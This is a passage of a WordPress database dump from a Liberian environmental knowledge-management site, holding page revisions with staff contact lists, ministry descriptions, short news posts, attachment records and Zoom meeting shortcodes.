href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong><br />Director <br />MOA <br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\nManager\nDepartment of Marine Fisheries and Environment\nNaFAA\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-02-25 15:40:32','2021-02-25 15:40:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3524,42,'2021-02-26 10:04:05','2021-02-26 10:04:05','','MIA','','inherit','open','closed','','mia','','','2021-02-26 10:04:05','2021-02-26 10:04:05','',1610,'https://ekmsliberia.info/wp-content/uploads/2019/11/MIA.png',0,'attachment','image/png',0),(3525,42,'2021-08-17 22:22:31','2021-08-17 22:22:31','The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.\n','Ministry of Internal Affairs','','inherit','closed','closed','','1610-autosave-v1','','','2021-08-17 22:22:31','2021-08-17 22:22:31','',1610,'https://ekmsliberia.info/1610-autosave-v1/',0,'revision','',0),(3526,42,'2021-02-26 10:51:30','2021-02-26 10:51:30','The MIA\'s responsibility is to administer Local Governance which basically involved Collection of Taxes, Maintenance of Peace and Tranquility, and Seeking the Welfare of the People. The MIA have undertaken some projects directly on government funding, while others are funded by development partners, including roads and bridges projects; local administrative buildings; commissioners’ residences; schools; clinics markets; peace huts; latrines; wells; etc.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mia\" page_length=\"false\"]','Ministry of Internal Affairs','','inherit','closed','closed','','1610-revision-v1','','','2021-02-26 10:51:30','2021-02-26 10:51:30','',1610,'https://ekmsliberia.info/1610-revision-v1/',0,'revision','',0),(3527,42,'2021-02-26 11:08:24','2021-02-26 11:08:24','','mpw','','inherit','open','closed','','mpw-3','','','2021-02-26 11:08:24','2021-02-26 11:08:24','',1594,'https://ekmsliberia.info/wp-content/uploads/2019/11/mpw.png',0,'attachment','image/png',0),(3528,42,'2021-02-26 11:09:01','2021-02-26 11:09:01','The Department of Public Works was created by an Act of the National Legislature in 1928, and was later changed to the Ministry of Public Works in 1972 to adequately administer the Engineering component of the State in terms of surveying, drafting/designing, construction and supervision, to improve and maintain, direct or by contract all highways, bridges, roads, streets, airport, seaport, and all other public infrastructure in the Republic of Liberia.\r\n\r\nThe Ministry sole purposes are surveying, drafting and designing construction and supervising construction contracts, and the maintenance of roads, bridges, and public buildings.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:mpw\" page_length=\"false\"]','Ministry of Public Works','','inherit','closed','closed','','1594-revision-v1','','','2021-02-26 11:09:01','2021-02-26 11:09:01','',1594,'https://ekmsliberia.info/1594-revision-v1/',0,'revision','',0),(3531,42,'2021-03-03 10:25:34','2021-03-03 10:25:34','<!-- wp:paragraph -->\n<p>The Department of Intersectorial Coordination on Thursday, February 25, 2021 held a one-day environmental unit meeting that attracted environmental focal points from line government ministries and agencies.</p>\n<!-- /wp:paragraph -->','Department of Intersectorial Coordination at EPA Holds a One-Day Environmental Meeting','','publish','open','open','','department-of-intersectorial-coordination-at-epa-holds-a-one-day-environmental-meeting','','','2021-03-03 10:26:39','2021-03-03 10:26:39','',0,'https://ekmsliberia.info/?p=3531',177,'post','',0),(3532,42,'2021-03-03 10:24:47','2021-03-03 10:24:47','','Meeting','','inherit','open','closed','','meeting','','','2021-03-03 10:24:47','2021-03-03 10:24:47','',3531,'https://ekmsliberia.info/wp-content/uploads/2021/03/Meeting.png',0,'attachment','image/png',0),(3533,42,'2021-03-03 10:25:34','2021-03-03 10:25:34','<!-- wp:paragraph -->\n<p>The Department of Intersectorial Coordination on Thursday, February 25, 2021 held a one-day environmental unit meeting that attracted environmental focal points from line government ministries and agencies.</p>\n<!-- /wp:paragraph -->','Department of Intersectorial Coordination  at EPA Holds a One-Day Environmental Meeting','','inherit','closed','closed','','3531-revision-v1','','','2021-03-03 10:25:34','2021-03-03 10:25:34','',3531,'https://ekmsliberia.info/3531-revision-v1/',0,'revision','',0),(3534,42,'2021-03-03 14:24:04','2021-03-03 14:24:04','<!-- wp:paragraph -->\n<p>The EPA on Friday, February 26, 2021 held a one-day inception workshop for the \'Initiative Climate Action Transparency\' (ICAT) Liberia Project at it\'s 4th Street Office in Sinkor.</p>\n<!-- /wp:paragraph -->','EPA holds a One-Day Inception Workshop for Initiative Climate Action Transparency','','publish','closed','closed','','epa-holds-a-one-day-inception-workshop-for-initiative-climate-action-transparency','','','2021-03-23 13:11:09','2021-03-23 13:11:09','',0,'https://ekmsliberia.info/?p=3534',176,'post','',0),(3536,42,'2021-03-03 14:22:03','2021-03-03 14:22:03','','ICAT','','inherit','open','closed','','icat','','','2021-03-03 14:22:03','2021-03-03 14:22:03','',3534,'https://ekmsliberia.info/wp-content/uploads/2021/03/ICAT.png',0,'attachment','image/png',0),(3537,42,'2021-03-03 14:23:02','2021-03-03 14:23:02','','ICAT','','inherit','open','closed','','icat-2','','','2021-03-03 14:23:02','2021-03-03 14:23:02','',3534,'https://ekmsliberia.info/wp-content/uploads/2021/03/ICAT-1.png',0,'attachment','image/png',0),(3538,42,'2021-03-03 14:24:04','2021-03-03 14:24:04','<!-- wp:paragraph -->\n<p>The EPA on Friday, February 26, 2021 held a one-day inception workshop for the \'Initiative Climate Action Transparency\' (ICAT) Liberia Project at it\'s 4th Street Office in Sinkor.</p>\n<!-- /wp:paragraph -->','EPA holds a One-Day Inception Workshop for Initiative Climate Action Transparency','','inherit','closed','closed','','3534-revision-v1','','','2021-03-03 14:24:04','2021-03-03 14:24:04','',3534,'https://ekmsliberia.info/3534-revision-v1/',0,'revision','',0),(3540,42,'2021-03-08 12:41:24','2021-03-08 12:41:24','','Piloting REDD+ in the Wonegizi Proposed Protected Area Community Benefits(1)','','inherit','open','closed','','piloting-redd-in-the-wonegizi-proposed-protected-area-community-benefits1','','','2021-03-08 12:41:24','2021-03-08 12:41:24','',0,'https://ekmsliberia.info/wp-content/uploads/2021/03/Piloting-REDD-in-the-Wonegizi-Proposed-Protected-Area-Community-Benefits1.pdf',0,'attachment','application/pdf',0),(3541,42,'2021-03-08 12:58:45','2021-03-08 12:58:45','The design and implementation of the REDD+ project in Wonegizi to VCS/CCBS requires activity data and emission factors for the project site or the broader landscape in which the project is located. Working with implementing partners, FFI established forest and post- deforestation sampling plots in 2013 and 2019 and gathered biomass data for estimation of plant carbon density and development of emission factors.','Wonegizi REDD+ Project: Baseline Carbon Stock Report','','publish','closed','closed','','wonegizi-redd-project-baseline-carbon-stock-report','','','2021-08-17 12:01:35','2021-08-17 12:01:35','',0,'https://ekmsliberia.info/?post_type=document&#038;p=3541',92,'document','',0),(3542,42,'2021-03-08 12:57:15','2021-03-08 12:57:15','','Wonegizi REDD+Project Carbon Baseline Report','','inherit','open','closed','','wonegizi-reddproject-carbon-baseline-report','','','2021-03-08 12:57:15','2021-03-08 12:57:15','',3541,'https://ekmsliberia.info/wp-content/uploads/2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report.pdf',0,'attachment','application/pdf',0),(3545,42,'2021-03-12 11:30:11','2021-03-12 11:30:11','','tnareport','','inherit','open','closed','','tna1','','','2021-03-12 11:30:26','2021-03-12 11:30:26','',3287,'https://ekmsliberia.info/wp-content/uploads/2020/12/TNA1.png',0,'attachment','image/png',0),(3547,42,'2021-03-12 11:43:30','2021-03-12 11:43:30','','Wonegizi REDD+Project Carbon Baseline Report','','inherit','open','closed','','wonegizi-reddproject-carbon-baseline-report-2','','','2021-03-12 11:43:30','2021-03-12 11:43:30','',0,'https://ekmsliberia.info/wp-content/uploads/2021/03/Wonegizi-REDDProject-Carbon-Baseline-Report-1.pdf',0,'attachment','application/pdf',0),(3548,42,'2021-03-12 11:45:06','2021-03-12 11:45:06','','ffi','','inherit','open','closed','','carbon','','','2021-08-17 12:01:36','2021-08-17 12:01:36','',3541,'https://ekmsliberia.info/wp-content/uploads/2021/03/carbon.png',0,'attachment','image/png',0),(3549,42,'2021-03-12 13:04:20','2021-03-12 13:04:20','','','','inherit','open','closed','','barrier','','','2021-03-12 13:08:07','2021-03-12 13:08:07','',3285,'https://ekmsliberia.info/wp-content/uploads/2020/12/barrier.png',0,'attachment','image/png',0),(3550,42,'2021-03-12 13:11:24','2021-03-12 13:11:24','','tnaagriculture','','inherit','open','closed','','tnaagriculture','','','2021-03-12 13:11:24','2021-03-12 13:11:24','',3282,'https://ekmsliberia.info/wp-content/uploads/2020/12/tnaagriculture.png',0,'attachment','image/png',0),(3551,42,'2021-03-12 13:13:46','2021-03-12 13:13:46','','tnamitigation','','inherit','open','closed','','tnamitigation','','','2021-03-12 13:13:46','2021-03-12 13:13:46','',3280,'https://ekmsliberia.info/wp-content/uploads/2020/12/tnamitigation.png',0,'attachment','image/png',0),(3552,42,'2021-03-12 13:17:08','2021-03-12 13:17:08','','tnaclimatechange','','inherit','open','closed','','tnaclimatechange','','','2021-03-12 13:17:08','2021-03-12 13:17:08','',3278,'https://ekmsliberia.info/wp-content/uploads/2020/12/tnaclimatechange.png',0,'attachment','image/png',0),(3553,42,'2021-03-12 13:19:47','2021-03-12 13:19:47','','tnacommunitybenefits','','inherit','open','closed','','tnacommunitybenefits','','','2021-03-12 13:19:47','2021-03-12 13:19:47','',3229,'https://ekmsliberia.info/wp-content/uploads/2020/11/tnacommunitybenefits.png',0,'attachment','image/png',0),(3554,42,'2021-03-12 13:23:05','2021-03-12 13:23:05','','abs protocol','','inherit','open','closed','','abs-protocol','','','2021-03-12 13:23:05','2021-03-12 13:23:05','',3240,'https://ekmsliberia.info/wp-content/uploads/2020/12/abs-protocol.png',0,'attachment','image/png',0),(3555,42,'2021-03-12 13:27:29','2021-03-12 13:27:29','','ace','','inherit','open','closed','','ace-2','','','2021-03-12 13:27:29','2021-03-12 13:27:29','',3243,'https://ekmsliberia.info/wp-content/uploads/2020/12/ace.png',0,'attachment','image/png',0),(3556,42,'2021-03-12 13:30:29','2021-03-12 13:30:29','The Cartagena Protocol on Bio-safety is one of the Protocols to the Convention on Biological Diversity. It was adopted by the Conference of the Parties to the Convention on 29 January 2000 as a supplementary agreement to the Convention on Biological Diversity','An Overview of the Cartagena Protocol','','inherit','closed','closed','','3245-autosave-v1','','','2021-03-12 13:30:29','2021-03-12 13:30:29','',3245,'https://ekmsliberia.info/3245-autosave-v1/',0,'revision','',0),(3557,42,'2021-03-12 13:30:40','2021-03-12 13:30:40','','cartagena','','inherit','open','closed','','cartagena','','','2021-03-12 13:30:40','2021-03-12 13:30:40','',3245,'https://ekmsliberia.info/wp-content/uploads/2020/12/cartagena.png',0,'attachment','image/png',0),(3558,42,'2021-03-12 13:32:36','2021-03-12 13:32:36','','unfccc','','inherit','open','closed','','unfccc','','','2021-03-12 13:32:36','2021-03-12 13:32:36','',3249,'https://ekmsliberia.info/wp-content/uploads/2020/12/unfccc.png',0,'attachment','image/png',0),(3559,42,'2021-03-12 13:34:28','2021-03-12 13:34:28','','cites','','inherit','open','closed','','cites','','','2021-03-12 13:34:28','2021-03-12 13:34:28','',3251,'https://ekmsliberia.info/wp-content/uploads/2020/12/cites.png',0,'attachment','image/png',0),(3560,42,'2021-03-12 13:36:12','2021-03-12 13:36:12','','minamata','','inherit','open','closed','','minamata','','','2021-03-12 13:36:12','2021-03-12 13:36:12','',3253,'https://ekmsliberia.info/wp-content/uploads/2020/12/minamata.png',0,'attachment','image/png',0),(3561,42,'2021-03-12 13:47:53','2021-03-12 13:47:53','','cbd','','inherit','open','closed','','cbd','','','2021-03-12 13:47:53','2021-03-12 13:47:53','',3257,'https://ekmsliberia.info/wp-content/uploads/2020/12/cbd.png',0,'attachment','image/png',0),(3562,42,'2021-03-12 13:57:35','2021-03-12 13:57:35','','cacc','','inherit','open','closed','','cacc','','','2021-03-12 13:57:35','2021-03-12 13:57:35','',3259,'https://ekmsliberia.info/wp-content/uploads/2020/12/cacc.png',0,'attachment','image/png',0),(3563,42,'2021-03-12 14:02:47','2021-03-12 14:02:47','','cms','','inherit','open','closed','','cms-2','','','2021-03-12 14:02:47','2021-03-12 14:02:47','',3261,'https://ekmsliberia.info/wp-content/uploads/2020/12/cms.png',0,'attachment','image/png',0),(3564,42,'2021-03-12 14:07:34','2021-03-12 14:07:34','','gcc','','inherit','open','closed','','gcc-2','','','2021-03-12 14:07:34','2021-03-12 14:07:34','',3263,'https://ekmsliberia.info/wp-content/uploads/2020/12/gcc.png',0,'attachment','image/png',0),(3565,42,'2021-03-12 14:09:24','2021-03-12 14:09:24','','ozone','','inherit','open','closed','','ozone-2','','','2021-03-12 14:09:24','2021-03-12 14:09:24','',3265,'https://ekmsliberia.info/wp-content/uploads/2020/12/ozone.png',0,'attachment','image/png',0),(3566,42,'2021-03-12 14:11:26','2021-03-12 14:11:26','The Capacity Building Initiative for Transparency( CBIT)<b>, </b>came into fruition as a result of the  Paris Agreement on Climate Change which primarily  rests upon a foundation of Nationally Determined Contributions (NDCs) originally submitted by Parties to the Convention in 2015, and formally adopted on November 4, 2016.','An Overview of Liberia’s Capacity Building Initiative for Transparency (CBIT)','','inherit','closed','closed','','3267-autosave-v1','','','2021-03-12 14:11:26','2021-03-12 14:11:26','',3267,'https://ekmsliberia.info/3267-autosave-v1/',0,'revision','',0),(3567,42,'2021-03-12 14:11:30','2021-03-12 14:11:30','','cbit','','inherit','open','closed','','cbit','','','2021-03-12 14:11:30','2021-03-12 14:11:30','',3267,'https://ekmsliberia.info/wp-content/uploads/2020/12/cbit.png',0,'attachment','image/png',0),(3568,42,'2021-03-12 14:14:32','2021-03-12 14:14:32','','stockholm','','inherit','open','closed','','stockholm','','','2021-03-12 14:14:32','2021-03-12 14:14:32','',3269,'https://ekmsliberia.info/wp-content/uploads/2020/12/stockholm.png',0,'attachment','image/png',0),(3569,42,'2021-03-12 14:19:14','2021-03-12 14:19:14','','ramsar','','inherit','open','closed','','ramsar','','','2021-03-12 14:19:14','2021-03-12 14:19:14','',3271,'https://ekmsliberia.info/wp-content/uploads/2020/12/ramsar.png',0,'attachment','image/png',0),(3570,42,'2021-03-12 14:23:04','2021-03-12 14:23:04','','tnaproject','','inherit','open','closed','','tnaproject','','','2021-03-12 14:23:04','2021-03-12 14:23:04','',3273,'https://ekmsliberia.info/wp-content/uploads/2020/12/tnaproject.png',0,'attachment','image/png',0),(3572,42,'2021-03-16 10:09:21','2021-03-16 10:09:21','','baselconvention','','inherit','open','closed','','baselconvention','','','2021-03-16 10:09:21','2021-03-16 10:09:21','',3247,'https://ekmsliberia.info/wp-content/uploads/2020/12/baselconvention.png',0,'attachment','image/png',0),(3574,42,'2021-03-16 10:38:52','2021-03-16 10:38:52','','waste','','inherit','open','closed','','waste','','','2021-03-16 10:38:52','2021-03-16 10:38:52','',2658,'https://ekmsliberia.info/wp-content/uploads/2019/11/waste.png',0,'attachment','image/png',0),(3575,42,'2021-03-16 11:52:56','2021-03-16 11:52:56','','papd','','inherit','open','closed','','ppad','','','2021-03-16 11:57:05','2021-03-16 11:57:05','',2309,'https://ekmsliberia.info/wp-content/uploads/2019/11/ppad.png',0,'attachment','image/png',0),(3576,42,'2021-03-16 12:54:54','2021-03-16 12:54:54','','wildlifeact','','inherit','open','closed','','wildlifeact','','','2021-03-16 12:54:54','2021-03-16 12:54:54','',2609,'https://ekmsliberia.info/wp-content/uploads/2019/11/wildlifeact.png',0,'attachment','image/png',0),(3577,42,'2021-03-18 11:15:07','2021-03-18 11:15:07','<!-- wp:paragraph -->\n<p>                 <code>[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]</code>    </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-18 11:15:07','2021-03-18 11:15:07','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3578,42,'2021-03-18 11:17:18','2021-03-18 11:17:18','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-18 11:17:18','2021-03-18 11:17:18','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3580,42,'2021-03-19 13:40:16','2021-03-19 13:40:16','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-19 13:40:16','2021-03-19 13:40:16','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3581,42,'2021-03-19 13:41:39','2021-03-19 13:41:39','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"123456789\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_webinars per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-19 13:41:39','2021-03-19 13:41:39','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3582,42,'2021-03-19 13:44:31','2021-03-19 13:44:31','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_webinars per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-19 13:44:31','2021-03-19 13:44:31','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3583,42,'2021-03-19 13:46:45','2021-03-19 13:46:45','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"23456789\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_webinars per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-19 13:46:45','2021-03-19 13:46:45','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3584,42,'2021-03-19 14:24:33','2021-03-19 14:24:33','<!-- wp:shortcode -->\n[zoom_api_link meeting_id=\"81554496996\" link_only=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>           </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_meetings per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>          </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[zoom_list_webinars per_page=\"5\" category=\"test,test2,test3\" order=\"ASC\" type=\"upcoming\" filter=\"no\"]\n<!-- /wp:shortcode -->','Online Meetings','','inherit','closed','closed','','3235-revision-v1','','','2021-03-19 14:24:33','2021-03-19 14:24:33','',3235,'https://ekmsliberia.info/3235-revision-v1/',0,'revision','',0),(3585,42,'2021-03-22 10:42:07','2021-03-22 10:42:07','The EPA through the CCCD Project in collaboration with the United National Development Program\r\n(UNDP) intends to hire a National Consultant to harmonize and strengthen the EPA Act for amendment by the\r\nLegislature. Considering the above, the EPA through the Cross-Cutting Capacity Project requests the services of a\r\nNational Consultant to work with the CCCD Project in collaboration with the EPA in achieving this objective.\r\n\r\nLink: <em><a href=\"http://epa.gov.lr/sites/default/files/Vacancy-EPA%20Seeks%20Services%20of%20Local%20Consultant%20to%20Review%20EPA%20Act.pdf\">EPA Seeks Services of Local Consultant to Review EPA Act</a></em>','REFRENCE NO: EOI/CCCD/EPA-2021-001, Review and Provide Harmonization Proposals for Amendment of the EPA Act by the Legislature','','publish','closed','closed','','refrence-no-eoi-cccd-epa-2021-001-review-and-provide-harmonization-proposals-for-amendment-of-the-epa-act-by-the-legislature','','','2021-03-22 10:42:07','2021-03-22 10:42:07','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3585',120,'ekms_bulletin','',0),(3588,42,'2021-03-23 08:51:35','2021-03-23 08:51:35','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a 